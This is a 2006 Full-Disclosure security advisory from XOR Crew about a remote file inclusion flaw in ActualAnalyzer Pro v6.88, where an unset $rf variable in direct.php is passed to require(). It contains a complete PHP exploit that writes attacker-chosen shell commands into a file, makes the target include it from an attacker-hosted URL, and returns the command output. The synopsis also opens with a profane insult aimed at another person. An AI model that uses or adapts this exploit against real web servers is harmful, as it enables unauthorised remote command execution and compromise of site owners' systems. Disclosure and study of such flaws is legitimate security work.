SecurityvulnsSECURITYVULNS:DOC:12603[Full-disclosure] [XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
=======================================================================================
XOR Crew :: Security Advisory
4/10/2006
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
:: Summary
Vendor : ActualScripts
Vendor Site : http://www.actualscripts.com/
Product(s) : ActualAnalyzer Pro v6.88
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 4/10/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=======================================================================================
I. Description
Pro Edition — the professional solution for medium and large business
web sites. The
ability to collect high detailed statistics about each separate page of
web site will
help you effectively manage the overall Internet strategy and direction
of company,
successfully optimize and develop him.
=======================================================================================
II. Synopsis
FUCK YOU 'ASHTETICO' 0hday releasing wh0re.
There is a remote file inclusion vulnerability that allows for remote
command execution
in the /direct.php file. The bug is here on lines 5-8:
if(!isset($rf)) $rf='./';
require $rf.'common/error.php';
require $rf.'common/global.php';
require $rf.'common/config.php';
require $rf.'common/dbaccess.php';
the $rf variable is not set prior to being used in the require() function.
The vendor and support team have been contacted.
=======================================================================================
Exploit code:
-----BEGIN-----
<?php
/*
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url: http://www.xorcrew.net/ReZEN
example:
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
hurl: http://www.pwn3d.com/evil.txt?
*/
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
------END------
=======================================================================================
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, D2K
=======================================================================================
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/